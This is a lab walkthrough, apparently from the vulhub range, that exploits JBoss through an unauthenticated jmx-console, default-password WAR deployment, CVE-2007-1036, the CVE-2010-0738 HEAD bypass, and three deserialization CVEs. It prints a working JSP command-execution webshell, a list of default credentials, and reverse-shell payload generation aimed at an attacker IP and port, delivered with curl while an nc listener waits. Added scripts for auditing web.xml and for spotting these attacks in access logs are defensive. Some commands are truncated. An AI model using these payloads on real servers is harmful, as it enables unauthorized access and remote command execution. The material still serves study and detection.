JBoss Vulnerability Reproduction
Lab range: /vulhub/jboss
JMX Console Unauthorized Access Vulnerability
# Introduction
The JBoss web UI at http://ip:port/jmx-console can be accessed without authorization (or with the default password admin/admin).
This discloses JBoss deployment and management information, and an attacker can also upload a webshell directly through it.
Vulnerability Discovery
Visit http://ip:port/jmx-console
If the page opens directly or a weak password logs you in, the vulnerability exists.
Remote deployment of WAR packages
- Find the flavor=URL,type=DeploymentScanner MBean (JBoss's built-in deployer, which deploys from a URL)
- Open it and find the addURL operation
- Host the WAR package on a VPS
```bash
# Package the JSP webshell as a WAR package (file names are elided in the source; placeholders shown)
jar -cvf <name>.war <name>.jsp
# Serve it over HTTP from the VPS on port 8000
python3 -m http.server 8000
```
Enter the URL of the WAR package (http://your-ip:8000/) as the addURL argument
- Then click Back to MBean View; under URLList check whether the Value column now contains the deployed URL, and finally click Apply Changes
- Go back to jmx-console and check the directory listing for the WAR we deployed
- Visit http://your-ip/shell/ and connect with AntSword.
JBoss weak password Getshell
The JBoss Administration Console has default account passwords that allow login; deploy a WAR package from the backend to get a shell.
```text
# JBoss weak passwords
admin/admin
jboss/admin
admin/jboss
admin/123456
admin/password
```
- Open the Administration Console and log in with the default account (admin/vulhub in this environment) to reach the backend
- Once inside, find Web Application (WAR), click Add a new resource, and deploy the WAR package containing the JSP webshell
- Visit http://your-ip:8080/cmd/ and connect with AntSword
CVE-2007-1036
The /jmx-console/HtmlAdaptor path in JBoss is exposed without any authentication mechanism, so an attacker can enter the JMX console and invoke any operation in it.
The exploit uses the DeploymentFileRepository -> store() method in the backend, uploading a shell by passing information through four parameters.
p1 is the name of the deployed WAR package, p2 is the file name of the uploaded file, p3 is the file extension, and p4 is the content of the uploaded file. By controlling these four parameters, an attacker can upload a shell and control the whole server. p2 and p3 are concatenated: for example, with p2=she and the rest of the file name in p3, the server still joins them and writes the file to the specified path.
- Visit the following URL to find the store() method
http://your-ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=:service=DeploymentFileRepository
- Deploy the WAR package
  - p1: the name of the deployed WAR package
  - p2: the file name of the uploaded file
  - p3: the file extension of the uploaded file
  - p4: the content of the uploaded file (the JSP webshell)
```jsp
<%-- Command-execution JSP webshell used as p4 --%>
<%@ page import="java.io.*" %>
<% String cmd = request.getParameter("cmd"); String output = "";   // command comes from ?cmd=
   if (cmd != null) { String s = null;
     try { Process p = Runtime.getRuntime().exec(cmd);
           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
           while ((s = sI.readLine()) != null) { output += s + "\r\n"; }   // collect stdout
     } catch (IOException e) { e.printStackTrace(); } }
   out.println(output); %>
```
- Visit http://your-ip:8080/job1/
That is all it takes.
CVE-2010-0738 (JMX Console security authentication bypass)
The principle is the same as CVE-2007-1036, except that the HEAD request method is used to bypass restrictions that only apply to GET and POST requests.
Affected versions: JBoss 4.2.0 to 4.3.0
- Capture the request with a proxy and replace GET with HEAD, constructing the following request header
- arg3 is the JSP webshell, just URL-encoded.
- Visit http://your-ip:8080/jmx-console/?cmd=id
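The HEAD bypass above works because the constraint protecting the console enumerates HTTP methods. The following audit script is an added example (not from this page or from JBoss) that flags such constraints in a web.xml; the two descriptors inside it are constructed, modelled on the vulnerable console shape and on the hardened form.

```python
"""Audit a web.xml for security-constraints that enumerate HTTP methods.

Added example, not from the vulhub page or JBoss. The CVE-2010-0738 bypass above
worked because the jmx-console constraint listed only GET and POST, so HEAD was
never challenged. Both descriptors here are constructed illustrations.
"""
import xml.etree.ElementTree as ET

# Constructed descriptor with the vulnerable shape: only GET and POST are guarded.
WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Hardened form: no <http-method> at all, so the constraint applies to every verb.
FIXED_WEB_XML = WEAK_WEB_XML.replace(
    "      <http-method>GET</http-method>\n      <http-method>POST</http-method>\n", "")


def _local(tag):
    """Strip the XML namespace so tag names compare the same with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def method_restricted_constraints(web_xml):
    """Return (resource-name, [methods]) for each constraint that lists verbs.

    Any verb not listed (HEAD, OPTIONS, PUT, ...) is outside the constraint and
    reaches the servlet unauthenticated; an empty result is what you want.
    """
    root = ET.fromstring(web_xml)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        for wrc in sc:
            if _local(wrc.tag) != "web-resource-collection":
                continue
            name = [c.text for c in wrc if _local(c.tag) == "web-resource-name"][0]
            methods = [c.text.strip() for c in wrc if _local(c.tag) == "http-method"]
            if methods:
                findings.append((name, methods))
    return findings
```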
CVE-2015-7501 (JMXInvokerServlet Deserialization Vulnerability)
A Java deserialization flaw: the ReadOnlyAccessFilter in JBoss's HttpInvoker component deserializes the data stream from the client without any security checks, with a very wide impact.
The vulnerability is triggered when JBoss reads a user-supplied object from an /invoker/JMXInvokerServlet request.
Vulnerability Discovery
Visit http://ip:port/invoker/JMXInvokerServlet
If the response is offered as a file download, the vulnerability exists.
Exploitation
- Download JavaDeserH2HC
```bash
git clone /joaomatosf/
cd JavaDeserH2HC
```
- Compile the file and generate the payload with the tool
```bash
# Compile the file (the commons-collections jar version is elided in the source)
javac -cp .:commons-collections-3.2.<version>.jar ReverseShellCommonsCollectionsHashMap.java
# Generate the serialized payload with the tool
java -cp .:commons-collections-3.2.<version>.jar ReverseShellCommonsCollectionsHashMap <attacker-ip>:<port>
```
- Listen on port 6666 and use curl to send the generated file to JBoss
```bash
# Listen
nc -lvvp 6666
# Send the malicious serialized object for JBoss to deserialize
curl http://target-ip:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollecti
```
- Reverse shell obtained!
CVE-2017-7504 (JBossMQ JMS deserialization vulnerability)
CVE-2017-7504 is similar in principle to CVE-2015-7501; only the exploitation path differs, and CVE-2017-7504 is found under /jbossmq-httpil/HTTPServerILServlet.
Scope of impact: JBoss AS and earlier versions
Vulnerability Discovery
Visit /jbossmq-httpil/HTTPServerILServlet
If the following page appears, the vulnerability exists
Exploitation
Continue using JavaDeserH2HC; remember to listen on port 6666 on the attacker machine.
```bash
# The serialized payload generated for the previous vulnerability is reused, so just send it with curl
curl http://target-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @
```
- Success!
CVE-2017-12149 (JBoss Application Server deserialization command execution vulnerability)
Same as above, with the path changed to /invoker/readonly
Scope: JBoss -
Vulnerability Discovery
Visit /invoker/readonly
If the following error message with status code 500 is returned, the vulnerability exists.
Exploitation
- Continue using JavaDeserH2HC
```bash
curl http://target-ip:8080/invoker/readonly --data-binary @
```
- Here comes the shell.
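As an added detection example that is not part of the original page, the following script runs over constructed access-log lines and flags the request patterns described across the sections above (unauthenticated jmx-console hits, the HEAD method bypass, invokeOp on DeploymentFileRepository, and posts to the three deserialization servlets); the IPs, timestamps and log lines are made up.

```python
"""Flag JBoss exploitation patterns from this page in HTTP access-log lines (added example,
not from the vulhub page). Paths and CVE numbers are the page's; the log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Servlets that deserialize a client-supplied Java object, per the page's last three sections.
DESER_ENDPOINTS = {
    "/invoker/JMXInvokerServlet": "CVE-2015-7501",
    "/jbossmq-httpil/HTTPServerILServlet": "CVE-2017-7504",
    "/invoker/readonly": "CVE-2017-12149",
}

def classify(line):
    """Return (source_ip, finding) tuples for one log line; [] when nothing matches."""
    m = CLF.match(line)
    if not m:
        return []
    ip, method, status = m["ip"], m["method"], int(m["status"])
    url = urlsplit(m["target"])
    query = parse_qs(url.query)           # percent-decodes, so %3A becomes ':'
    hits = []
    if url.path.startswith("/jmx-console/"):
        if status == 200:
            hits.append((ip, "jmx-console answered 200: no auth challenge"))
        if method not in ("GET", "POST"):  # the console's constraint only listed GET/POST
            hits.append((ip, f"{method} to jmx-console: CVE-2010-0738 method bypass"))
        if query.get("action") == ["invokeOp"] and "DeploymentFileRepository" in query.get("name", [""])[0]:
            hits.append((ip, "invokeOp on DeploymentFileRepository: CVE-2007-1036 file drop"))
    elif url.path in DESER_ENDPOINTS:
        cve = DESER_ENDPOINTS[url.path]
        kind = "POST body" if method == "POST" else "probe"
        hits.append((ip, f"{kind} to {url.path}: {cve} deserialization endpoint"))
    return hits

def scan(lines):
    """Run classify over every line and flatten the findings."""
    return [hit for line in lines for hit in classify(line)]

# Constructed sample log: one benign hit, one of each attack pattern, one blocked 401.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp'
    '&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5 HTTP/1.1" 200 -',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1421',
    '10.0.0.9 - - [12/Mar/2024:10:01:10 +0000] "POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1" 500 310',
    '10.0.0.9 - - [12/Mar/2024:10:01:11 +0000] "GET /invoker/readonly HTTP/1.1" 500 120',
    '10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 0',
]
```

Run `scan(SAMPLE_LOG)` to get the findings; the HEAD line yields three separate findings and the 401 line none.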